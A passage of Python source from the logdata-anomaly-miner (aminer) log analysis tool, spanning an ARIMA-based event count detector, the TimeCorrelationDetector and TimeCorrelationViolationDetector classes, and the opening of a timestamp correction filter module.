which is the minimum in the last and next self.acf_auto_pause_interval_num_min values for i in range(self.acf_auto_pause_interval_num_min, len(corrfit)-self.acf_auto_pause_interval_num_min): if corrfit[i] == min(corrfit[i-self.acf_auto_pause_interval_num_min: i+self.acf_auto_pause_interval_num_min+1]): min_lag = i break # Find the highest peak and set the time-step as the index + lag highest_peak_index = np.argmax(corrfit[min_lag:]) if corrfit[min_lag + highest_peak_index] > self.acf_threshold: time_step_list.append((highest_peak_index + min_lag) / self.num_division_time_step * self.waiting_time / self.num_sections_waiting_time) else: time_step_list.append(-1) # Round the time_steps if they are similar to the times in self.assumed_time_steps for index, time_step in enumerate(time_step_list): if time_step != -1: for assumed_time_step in self.assumed_time_steps: if abs(assumed_time_step - time_step * self.num_division_time_step) / assumed_time_step <\ self.round_time_interval_threshold: time_step_list[index] = assumed_time_step / self.num_division_time_step break for index, time_step in enumerate(time_step_list): if time_step_list[index] != -1 and sum(counts[index]) / len(counts[index]) * time_step_list[index] /\ self.waiting_time * self.num_sections_waiting_time <\ self.min_log_lines_per_time_step: time_step_list[index] = -1 # Print a message of the length of the time steps message = f'Calculated the periods for the single event types in seconds: '\ f'{[time_step * self.num_division_time_step if time_step != -1 else "None" for time_step in time_step_list]}' affected_path = [] self.print(message, log_atom, affected_path) return time_step_list def test_num_appearance(self, event_index, count, current_time, log_atom): """This function makes a one-step prediction and raises an alert if the count do not match the expected appearance""" if self.learn_mode is True and self.stop_learning_timestamp is not None and \ self.stop_learning_timestamp < log_atom.atom_time: logging.getLogger(DEBUG_LOG_NAME).info("Stopping learning in the %s.", self.__class__.__name__) self.learn_mode = False # Append the list of time_window_history and arima_models if it is to short if len(self.time_window_history) <= event_index: self.time_window_history += [[] for _ in range(event_index + 1 - len(self.time_window_history))] self.arima_models += [None for _ in range(event_index + 1 - len(self.arima_models))] self.prediction_history += [[[], [], []] for _ in range(event_index + 1 - len(self.prediction_history))] self.time_history += [[] for _ in range(event_index + 1 - len(self.time_history))] self.result_list += [[1]*self.num_results_bt for _ in range(event_index + 1 - len(self.result_list))] # Initialize the arima_model if needed if self.learn_mode and self.arima_models[event_index] is None: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) if len(self.time_window_history[event_index]) > 2 * self.num_periods_tsa_ini * self.num_division_time_step: self.time_window_history[event_index] = self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step:] # Check if enough values have been stored to initialize the arima_model if len(self.time_window_history[event_index]) >= self.num_periods_tsa_ini*self.num_division_time_step: message = f'Initializing the TSA for the event {self.event_type_detector.get_event_type(event_index)}' affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) if not self.build_sum_over_values: # Add the arima_model to the list try: model = ARIMA( self.time_window_history[event_index][-self.num_periods_tsa_ini*self.num_division_time_step:], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index] = None else: # Add the arima_model to the list try: model = ARIMA([sum(self.time_window_history[event_index][ -self.num_periods_tsa_ini*self.num_division_time_step+i: -(self.num_periods_tsa_ini-1)*self.num_division_time_step+i]) for i in range((self.num_periods_tsa_ini-1)*self.num_division_time_step)]+[ sum(self.time_window_history[event_index][-self.num_division_time_step:])], order=(self.num_division_time_step, 0, 0), seasonal_order=(0, 0, 0, self.num_division_time_step)) self.arima_models[event_index] = model.fit() except: # skipcq FLK-E722 self.arima_models[event_index] = None self.time_window_history[event_index] = [] if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = current_time + self.stop_learning_no_anomaly_time # Add the new value and make a one-step prediction elif self.arima_models[event_index] is not None: if not self.build_sum_over_values: # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: self.prediction_history[event_index][0].append(0) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(0) self.time_history[event_index].append(current_time) else: self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(current_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] if self.test_pause is not None and len(self.test_pause) > event_index and self.test_pause[event_index] is not None: if self.test_pause[event_index] == 1: self.test_pause[event_index] = None # If all entries are None set the variable to None if all(entry is None for entry in self.test_pause): self.test_pause = None else: self.test_pause[event_index] -= 1 else: # Test if count is in boundaries if count < lower_limit or count > upper_limit: message = f'Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count}, '\ f'Upper: {upper_limit}' affected_path = self.event_type_detector.variable_key_list[event_index] if count < lower_limit: confidence = (lower_limit - count) / (upper_limit - count) else: confidence = (count - upper_limit) / (count - lower_limit) self.print(message, log_atom, affected_path, confidence=confidence) self.result_list[event_index].append(0) else: self.result_list[event_index].append(1) if len(self.result_list[event_index]) >= 2 * self.num_results_bt: self.result_list[event_index] = self.result_list[event_index][-self.num_results_bt:] # Discard or update the model, for the next step if self.learn_mode and sum(self.result_list[event_index][-self.num_results_bt:]) < self.bt_min_suc: message = f'Discard the TSA model for the event {self.event_type_detector.get_event_type(event_index)}' affected_path = self.event_type_detector.variable_key_list[event_index] self.print(message, log_atom, affected_path) # Discard the trained model and reset the result_list self.arima_models[event_index] = None self.result_list[event_index] = [1]*self.num_results_bt if self.stop_learning_timestamp is not None and self.stop_learning_no_anomaly_time is not None: self.stop_learning_timestamp = current_time + self.stop_learning_no_anomaly_time else: # Update the model self.arima_models[event_index] = self.arima_models[event_index].append([count]) else: # Add the new count to the history and shorten it, if necessary self.time_window_history[event_index].append(count) count_sum = sum(self.time_window_history[event_index][-self.num_division_time_step:]) # Add the prediction and time to the lists lower_limit, upper_limit = self.one_step_prediction(event_index) self.prediction_history[event_index][0].append(lower_limit) self.prediction_history[event_index][1].append(count_sum) self.prediction_history[event_index][2].append(upper_limit) self.time_history[event_index].append(current_time) # Shorten the lists if necessary if len(self.time_history[event_index]) > self.num_max_time_history: self.prediction_history[event_index][0] = self.prediction_history[event_index][0][-self.num_min_time_history:] self.prediction_history[event_index][1] = self.prediction_history[event_index][1][-self.num_min_time_history:] self.prediction_history[event_index][2] = self.prediction_history[event_index][2][-self.num_min_time_history:] self.time_history[event_index] = self.time_history[event_index][-self.num_min_time_history:] # Test if count_sum is in boundaries if count_sum < lower_limit or count_sum > upper_limit: message = f'Event: {self.event_type_detector.get_event_type(event_index)}, Lower: {lower_limit}, Count: {count_sum}, '\ f'Upper: {upper_limit}' affected_path = self.event_type_detector.variable_key_list[event_index] confidence = 1 - min(count_sum / lower_limit, upper_limit / count_sum) self.print(message, log_atom, affected_path, confidence=confidence) # Update the model, for the next step self.arima_models[event_index] = self.arima_models[event_index].append([count_sum]) def one_step_prediction(self, event_index): """Make a one step prediction with the Arima model""" prediction = self.arima_models[event_index].get_forecast(1) prediction = prediction.conf_int(alpha=self.alpha) # return in the order: lower_limit, upper_limit return prediction[0][0], prediction[0][1] def bt_min_successes(self, num_bt, p, alpha): # skipcq: PYL-R0201 """ Calculate the minimal number of successes for the BT with significance alpha. p is the probability of success and num_bt is the number of observed tests. """ tmp_sum = 0.0 max_observations_factorial = np.math.factorial(num_bt) i_factorial = 1 for i in range(num_bt + 1): i_factorial = i_factorial * max(i, 1) tmp_sum = tmp_sum + max_observations_factorial / (i_factorial * np.math.factorial(num_bt - i)) * ((1 - p) ** i) * ( p ** (num_bt - i)) if tmp_sum > alpha: return i return num_bt def print(self, message, log_atom, affected_path, confidence=None): """Print the message.""" if isinstance(affected_path, str): affected_path = [affected_path] original_log_line_prefix = self.aminer_config.config_properties.get(CONFIG_KEY_LOG_LINE_PREFIX, DEFAULT_LOG_LINE_PREFIX) if original_log_line_prefix is None: original_log_line_prefix = '' if self.output_logline: tmp_str = '' for x in list(log_atom.parser_match.get_match_dictionary().keys()): tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + original_log_line_prefix + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary().keys())} else: tmp_str = '' for x in affected_path: tmp_str += ' ' + x + os.linesep tmp_str = tmp_str.lstrip(' ') sorted_log_lines = [tmp_str + log_atom.raw_data.decode()] analysis_component = {'AffectedLogAtomPaths': affected_path} if confidence is not None: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {'Confidence': confidence}} else: event_data = {'AnalysisComponent': analysis_component, 'TotalRecords': self.event_type_detector.total_records, 'TypeInfo': {}} for listener in self.anomaly_event_handlers: # skipcq: PYL-C0209, FLK-E501 listener.receive_event(f'Analysis.{self.__class__.__name__}', message, sorted_log_lines, event_data, log_atom, self) TimeCorrelationDetector.py000066400000000000000000000341001437606560100361150ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for time correlation between atoms. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from datetime import datetime import random import time import logging from aminer.AminerConfig import build_persistence_file_name, DEBUG_LOG_NAME, KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD from aminer import AminerConfig from aminer.AnalysisChild import AnalysisContext from aminer.analysis import Rules from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import get_log_int from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface class TimeCorrelationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class tries to find time correlation patterns between different log atoms. When a possible correlation rule is detected, it creates an event including the rules. This is useful to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006. """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, anomaly_event_handlers, parallel_check_count, persistence_id='Default', record_count_before_event=10000, output_logline=True, use_path_match=True, use_value_match=True, min_rule_attributes=1, max_rule_attributes=5): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param parallel_check_count number of rule detection checks to run in parallel. @param persistence_id name of persistence file. @param record_count_before_event number of events used to calculate statistics (i.e., window size) @param output_logline specifies whether the full parsed log atom should be provided in the output. @param min_rule_attributes minimum number of attributes forming a rule @param max_rule_attributes maximum number of attributes forming a rule @param use_path_match if true rules are build based on path existence @param use_value_match if true rules are built based on actual values """ self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, anomaly_event_handlers=anomaly_event_handlers, parallel_check_count=parallel_check_count, persistence_id=persistence_id, record_count_before_event=record_count_before_event, output_logline=output_logline, use_path_match=use_path_match, use_value_match=use_value_match, min_rule_attributes=min_rule_attributes, max_rule_attributes=max_rule_attributes ) self.last_timestamp = 0.0 self.last_unhandled_match = None self.total_records = 0 self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) persistence_data = PersistenceUtil.load_json(self.persistence_file_name) if persistence_data is None: self.feature_list = [] self.event_count_table = [0] * parallel_check_count * parallel_check_count * 2 self.event_delta_table = [0] * parallel_check_count * parallel_check_count * 2 else: logging.getLogger(DEBUG_LOG_NAME).debug("%s loaded persistence data.", self.__class__.__name__) def receive_atom(self, log_atom): """Receive a log atom from a source.""" self.log_total += 1 event_data = {} timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() if timestamp < self.last_timestamp: for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', f'Logdata not sorted: last {self.last_timestamp}, current {timestamp}', [log_atom.parser_match.match_element.annotate_match('')], event_data, log_atom, self) return self.last_timestamp = timestamp self.total_records += 1 features_found_list = [] for feature in self.feature_list: if feature.rule.match(log_atom): feature.trigger_count += 1 self.update_tables_for_feature(feature, timestamp) features_found_list.append(feature) if len(self.feature_list) < self.parallel_check_count: if (random.randint(0, 1) != 0) and (self.last_unhandled_match is not None): log_atom = self.last_unhandled_match new_rule = self.create_random_rule(log_atom) if new_rule is not None: new_feature = CorrelationFeature(new_rule, len(self.feature_list), timestamp) self.feature_list.append(new_feature) new_feature.trigger_count = 1 self.update_tables_for_feature(new_feature, timestamp) features_found_list.append(new_feature) for feature in features_found_list: feature.last_trigger_time = timestamp if not features_found_list: self.last_unhandled_match = log_atom if (self.total_records % self.record_count_before_event) == 0: result = self.total_records * [''] result[0] = self.analysis_status_to_string() analysis_component = {'AffectedLogAtomPaths': list(log_atom.parser_match.get_match_dictionary()), 'AffectedLogAtomValues': [log_atom.raw_data.decode(AminerConfig.ENCODING)]} if self.output_logline: feature_list = [] for feature in self.feature_list: tmp_list = {} r = self.rule_to_dict(feature.rule) tmp_list['Rule'] = r tmp_list['Index'] = feature.index tmp_list['CreationTime'] = feature.creation_time tmp_list['LastTriggerTime'] = feature.last_trigger_time tmp_list['TriggerCount'] = feature.trigger_count feature_list.append(tmp_list) analysis_component['FeatureList'] = feature_list analysis_component['AnalysisStatus'] = result[0] analysis_component['TotalRecords'] = self.total_records event_data['AnalysisComponent'] = analysis_component for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', 'Correlation report', result, event_data, log_atom, self) self.reset_statistics() logging.getLogger(DEBUG_LOG_NAME).debug("%s ran analysis.", self.__class__.__name__) self.log_success += 1 def rule_to_dict(self, rule): """Convert a rule to a dict structure.""" r = {'type': str(rule.__class__.__name__)} for var in vars(rule): attr = getattr(rule, var, None) if attr is None: r[var] = None elif isinstance(attr, list): tmp_list = [] for v in attr: d = self.rule_to_dict(v) d['type'] = str(v.__class__.__name__) tmp_list.append(d) r['subRules'] = tmp_list else: r[var] = attr return r def do_timer(self, trigger_time): """Check if current ruleset should be persisted.""" if self.next_persist_time is None: return self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) delta = self.next_persist_time - trigger_time if delta <= 0: self.do_persist() delta = self.aminer_config.config_properties.get(KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) self.next_persist_time = time.time() + delta return delta def do_persist(self): """Immediately write persistence data to storage.""" logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def create_random_rule(self, log_atom): """Create a random existing path rule or value match rule.""" parser_match = log_atom.parser_match sub_rules = [] all_keys = list(parser_match.get_match_dictionary().keys()) attribute_count = self.min_rule_attributes + get_log_int(self.max_rule_attributes - self.min_rule_attributes) while attribute_count > 0: key_pos = random.randint(0, len(all_keys) - 1) key_name = all_keys[key_pos] all_keys = all_keys[:key_pos] + all_keys[key_pos + 1:] key_value = parser_match.get_match_dictionary().get(key_name).match_object # Not much sense handling parsed date values in this implementation, so just ignore this attribute. if (isinstance(key_value, tuple)) and (isinstance(key_value[0], datetime)): if not all_keys: break continue attribute_count -= 1 rule_type = 1 # default is value_match only if none specified if self.use_path_match and not self.use_value_match: rule_type = 0 if not self.use_path_match and self.use_value_match: rule_type = 1 if self.use_path_match and self.use_value_match: rule_type = random.randint(0, 1) if rule_type == 0: sub_rules.append(Rules.PathExistsMatchRule(key_name)) elif rule_type == 1: sub_rules.append(Rules.ValueMatchRule(key_name, key_value)) else: msg = 'Invalid rule type' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) if not all_keys: break if len(sub_rules) > 1: return Rules.AndMatchRule(sub_rules) if len(sub_rules) > 0: return sub_rules[0] return None def update_tables_for_feature(self, target_feature, timestamp): """ Assume that this event was the effect of a previous cause-related event. Loop over all cause-related features (rows) to search for matches. """ feature_table_pos = (target_feature.index << 1) for feature in self.feature_list: delta = timestamp - feature.last_trigger_time if delta <= 10.0: self.event_count_table[feature_table_pos] += 1 self.event_delta_table[feature_table_pos] += int(delta * 1000) feature_table_pos += (self.parallel_check_count << 1) feature_table_pos = ((target_feature.index * self.parallel_check_count) << 1) + 1 for feature in self.feature_list: delta = timestamp - feature.last_trigger_time if delta <= 10.0: self.event_count_table[feature_table_pos] += 1 self.event_delta_table[feature_table_pos] -= int(delta * 1000) feature_table_pos += 2 def analysis_status_to_string(self): """Get a string representation of all features.""" result = '' for feature in self.feature_list: trigger_count = feature.trigger_count result += f'{feature.rule} ({feature.index}) e = {trigger_count}:' stat_pos = (self.parallel_check_count * feature.index) << 1 for feature_pos in range(len(self.feature_list)): # skipcq: PTC-W0060 event_count = self.event_count_table[stat_pos] ratio = '-' if trigger_count != 0: # skipcq: PYL-C0209 ratio = '%.2e' % (float(event_count) / trigger_count) delta = '-' if event_count != 0: # skipcq: PYL-C0209 delta = '%.2e' % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count) # skipcq: PYL-C0209 result += '\n %d: {c = %#6d r = %s dt = %s' % (feature_pos, event_count, ratio, delta) stat_pos += 1 event_count = self.event_count_table[stat_pos] ratio = '-' if trigger_count != 0: # skipcq: PYL-C0209 ratio = '%.2e' % (float(event_count) / trigger_count) delta = '-' if event_count != 0: # skipcq: PYL-C0209 delta = '%.2e' % (float(self.event_delta_table[stat_pos]) * 0.001 / event_count) # skipcq: PYL-C0209 result += ' c = %#6d r = %s dt = %s}' % (event_count, ratio, delta) stat_pos += 1 result += '\n' return result def reset_statistics(self): """Reset all features.""" for feature in self.feature_list: feature.creation_time = 0 feature.last_trigger_time = 0 feature.trigger_count = 0 self.event_count_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 self.event_delta_table = [0] * self.parallel_check_count * self.parallel_check_count * 2 class CorrelationFeature: """This class defines a correlation feature.""" def __init__(self, rule, index, creation_time): self.rule = rule self.index = index self.creation_time = creation_time self.last_trigger_time = 0.0 self.trigger_count = 0 TimeCorrelationViolationDetector.py000066400000000000000000000422361437606560100400130ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This module defines a detector for time correlation rules. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ import time import logging from aminer.AminerConfig import KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD, build_persistence_file_name, DEBUG_LOG_NAME from aminer.AnalysisChild import AnalysisContext from aminer.input.InputInterfaces import AtomHandlerInterface from aminer.util.History import LogarithmicBackoffHistory from aminer.util import PersistenceUtil from aminer.util.TimeTriggeredComponentInterface import TimeTriggeredComponentInterface from aminer.analysis import Rules class TimeCorrelationViolationDetector(AtomHandlerInterface, TimeTriggeredComponentInterface): """ This class creates events when one of the given time correlation rules is violated. This is used to implement checks as depicted in http://dx.doi.org/10.1016/j.cose.2014.09.006 """ time_trigger_class = AnalysisContext.TIME_TRIGGER_CLASS_REALTIME def __init__(self, aminer_config, ruleset, anomaly_event_handlers, persistence_id='Default', output_logline=True): """ Initialize the detector. This will also trigger reading or creation of persistence storage location. @param aminer_config configuration from analysis_context. @param ruleset a list of MatchRule rules with appropriate CorrelationRules attached as actions. @param anomaly_event_handlers for handling events, e.g., print events to stdout. @param persistence_id name of persistence file. @param output_logline specifies whether the full parsed log atom should be provided in the output. """ self.next_persist_time, self.log_success, self.log_total = [None]*3 super().__init__( aminer_config=aminer_config, ruleset=ruleset, anomaly_event_handlers=anomaly_event_handlers, persistence_id=persistence_id, output_logline=output_logline ) self.last_log_atom = None event_correlation_set = set() for rule in self.ruleset: if rule.match_action.artefact_a_rules is not None: event_correlation_set |= set(rule.match_action.artefact_a_rules) if rule.match_action.artefact_b_rules is not None: event_correlation_set |= set(rule.match_action.artefact_b_rules) self.event_correlation_ruleset = list(event_correlation_set) self.persistence_file_name = build_persistence_file_name(aminer_config, self.__class__.__name__, persistence_id) PersistenceUtil.add_persistable_component(self) def receive_atom(self, log_atom): """Receive a parsed atom and evaluate all the classification rules and event triggering on violations.""" self.log_total += 1 self.last_log_atom = log_atom for rule in self.ruleset: rule.match(log_atom) self.log_success += 1 def do_timer(self, trigger_time): """Check for any rule violations and if the current ruleset should be persisted.""" # Persist the state only quite infrequently: As most correlation rules react in timeline of seconds, the persisted data will most # likely be unsuitable to catch lost events. So persistence is mostly to capture the correlation rule context, e.g. the history # of loglines matched before. if self.next_persist_time - trigger_time <= 0: self.do_persist() self.next_persist_time = time.time() + self.aminer_config.config_properties.get( KEY_PERSISTENCE_PERIOD, DEFAULT_PERSISTENCE_PERIOD) # Check all correlation rules, generate single events for each violated rule, possibly containing multiple records. As we might # be processing historic data, the timestamp last seen is unknown here. Hence, rules not receiving newer events might not notice # for a long time, that they hold information about correlation impossible to fulfil. Take the newest timestamp of any rule # and use it for checking. newest_timestamp = 0.0 for rule in self.event_correlation_ruleset: newest_timestamp = max(newest_timestamp, rule.last_timestamp_seen) for rule in self.event_correlation_ruleset: check_result = rule.check_status(newest_timestamp) if check_result is None: continue self.last_log_atom.set_timestamp(trigger_time) r = {'RuleId': rule.rule_id, 'MinTimeDelta': rule.min_time_delta, 'MaxTimeDelta': rule.max_time_delta, 'ArtefactMatchParameters': rule.artefact_match_parameters, 'HistoryAEvents': rule.history_a_events, 'HistoryBEvents': rule.history_b_events, 'LastTimestampSeen': rule.last_timestamp_seen} history = {'MaxItems': rule.correlation_history.max_items} h = [] for item in rule.correlation_history.history: h.append(repr(item)) history['History'] = h r['correlation_history'] = history analysis_component = {'Rule': r, 'CheckResult': check_result, 'NewestTimestamp': newest_timestamp} event_data = {'AnalysisComponent': analysis_component} for listener in self.anomaly_event_handlers: listener.receive_event(f'Analysis.{self.__class__.__name__}', f'Correlation rule "{rule.rule_id}" violated', [check_result[0]], event_data, self.last_log_atom, self) return 10.0 def do_persist(self): """Immediately write persistence data to storage.""" logging.getLogger(DEBUG_LOG_NAME).debug("%s persisted data.", self.__class__.__name__) def log_statistics(self, component_name): """ Log statistics of an AtomHandler. Override this method for more sophisticated statistics output of the AtomHandler. @param component_name the name of the component which is printed in the log line. """ super().log_statistics(component_name) for i, rule in enumerate(self.ruleset): rule.log_statistics(component_name + '.' + rule.__class__.__name__ + str(i)) class EventClassSelector(Rules.MatchAction): """This match action selects one event class by adding it to a MatchRule. It then triggers the appropriate CorrelationRules.""" def __init__(self, action_id, artefact_a_rules, artefact_b_rules): self.action_id = action_id self.artefact_a_rules = artefact_a_rules self.artefact_b_rules = artefact_b_rules def match_action(self, log_atom): """ Invoke if a rule has matched. @param log_atom the parser match_element that was also matching the rules. """ if self.artefact_a_rules is not None: for a_rule in self.artefact_a_rules: a_rule.update_artefact_a(self, log_atom) if self.artefact_b_rules is not None: for b_rule in self.artefact_b_rules: b_rule.update_artefact_b(self, log_atom) class CorrelationRule: """ This class defines a correlation rule to match artefacts A and B. A hidden event A* always triggers at least one artefact A and the hidden event B*, thus triggering also at least one artefact B. """ def __init__(self, rule_id, min_time_delta, max_time_delta, artefact_match_parameters=None): """ Create the correlation rule. @param rule_id a unique identifier of the rule. @param min_time_delta minimal delta in seconds, that artefact B may be observed after artefact A. Negative values are allowed as artefact B may be found before A. @param max_time_delta maximum delta in seconds, that artefact B may be observed after artefact A. Negative values are allowed as artefact B may be found before A. @param artefact_match_parameters if not none, two artefacts A and B will be only treated as correlated when all the parsed artefact attributes identified by the list of attribute path tuples match. """ self.rule_id = rule_id self.min_time_delta = min_time_delta self.max_time_delta = max_time_delta self.artefact_match_parameters = artefact_match_parameters self.history_a_events = [] self.history_b_events = [] self.last_timestamp_seen = 0.0 self.correlation_history = LogarithmicBackoffHistory(10) def update_artefact_a(self, selector, log_atom): """Append entry to the event history A.""" history_entry = self.prepare_history_entry(selector, log_atom) # Check if event A could be discarded immediately. self.history_a_events.append(history_entry) def update_artefact_b(self, selector, log_atom): """Append entry to the event history B.""" history_entry = self.prepare_history_entry(selector, log_atom) # Check if event B could be discarded immediately. self.history_b_events.append(history_entry) def check_status(self, newest_timestamp, max_violations=20): """@return None if status is OK. Return a tuple containing a descriptive message and a list of violating log data lines on error.""" # This part of code would be good target to be implemented as native library with optimized algorithm in future. a_pos = 0 check_range = len(self.history_a_events) violation_logs = [] violation_message = '' num_violations = 0 while a_pos < check_range: deleted = False check_range = len(self.history_a_events) a_event = self.history_a_events[a_pos] if a_event is None: continue a_event_time = a_event[0] b_pos = 0 while b_pos < len(self.history_b_events): b_event = self.history_b_events[b_pos] if b_event is None: continue b_event_time = b_event[0] delta = b_event_time - a_event_time if delta < self.min_time_delta: # See if too early, if yes go to next element. As we will not check again any older aEvents in this loop, skip # all bEvents up to this position in future runs. if b_pos < len(self.history_b_events): violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was found too' \ f' early!\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break continue # Too late, no other b_event may match this a_event if delta > self.max_time_delta: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: B-Event for \"{violation_line}\" ({ a_event[2].action_id}) was not found in' \ f' time!\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break # So time range is OK, see if match parameters are also equal. violation_found = False for check_pos in range(4, len(a_event)): # skipcq: PTC-W0060 if a_event[check_pos] != b_event[check_pos]: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: \"{violation_line}\" ({a_event[2].action_id}) {a_event[check_pos]} is not' \ f' equal {b_event[check_pos]}\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 violation_found = True break check_pos = check_pos + 1 if violation_found: continue # We want to keep a history of good matches to ease diagnosis of correlation failures. Keep information about current line # for reference. self.correlation_history.add_object((a_event[3].match_element.match_string, a_event[2].action_id, b_event[3].match_element.match_string, b_event[2].action_id)) del self.history_a_events[a_pos] del self.history_b_events[b_pos] deleted = True check_range = check_range - 1 b_pos = b_pos + 1 if deleted is False: a_pos = a_pos + 1 # After checking all aEvents before a_pos were cleared, otherwise they violate a correlation rule. for a_pos in range(0, check_range): a_event = self.history_a_events[a_pos] if a_event is None: continue delta = newest_timestamp - a_event[0] if delta > self.max_time_delta: violation_line = a_event[3].match_element.match_string if isinstance(violation_line, bytes): violation_line = violation_line.decode() if num_violations <= max_violations: violation_message += f'FAIL: B-Event for \"{violation_line}\" ({a_event[2].action_id}) was not found in time!\n' violation_logs.append(violation_line) del self.history_a_events[a_pos] deleted = True check_range = check_range - 1 num_violations = num_violations + 1 break if num_violations > max_violations: violation_message += f'... ({num_violations - max_violations} more)\n' if num_violations != 0 and len(self.correlation_history.get_history()) > 0: violation_message += 'Historic examples:\n' for record in self.correlation_history.get_history(): violation_message += f' "{record[0].decode()}" ({record[1]}) ==> "{record[2].decode()}" ({record[3]})\n' if num_violations == 0: return None return violation_message, violation_logs def prepare_history_entry(self, selector, log_atom): """Return a history entry for a parser match.""" parser_match = log_atom.parser_match timestamp = log_atom.get_timestamp() if timestamp is None: timestamp = time.time() length = 4 if self.artefact_match_parameters is not None: length += len(self.artefact_match_parameters) result = [None] * length result[0] = timestamp result[1] = 0 result[2] = selector result[3] = parser_match if result[0] < self.last_timestamp_seen: msg = 'Timestamps unsorted!' logging.getLogger(DEBUG_LOG_NAME).error(msg) raise Exception(msg) self.last_timestamp_seen = result[0] if self.artefact_match_parameters is not None: pos = 4 v_dict = parser_match.get_match_dictionary() for artefact_match_parameter in self.artefact_match_parameters: for param_path in artefact_match_parameter: match_element = v_dict.get(param_path, None) if match_element is not None: result[pos] = match_element.match_object pos += 1 return result TimestampCorrectionFilters.py000066400000000000000000000044101437606560100366500ustar00rootroot00000000000000logdata-anomaly-miner-2.6.1/source/root/usr/lib/logdata-anomaly-miner/aminer/analysis""" This file collects various classes useful to filter and correct the timestamp associated with a received parsed atom. This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version. This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU General Public License for more details. You should have received a copy of the GNU General Public License along with this program. If not, see . """ from aminer.input.InputInterfaces import AtomHandlerInterface class SimpleMonotonicTimestampAdjust(AtomHandlerInterface): """ Handlers of this class compare the timestamp of a newly received atom with the largest timestamp seen so far. When below, the timestamp of this atom is adjusted to the largest value seen, otherwise the largest value seen is updated. 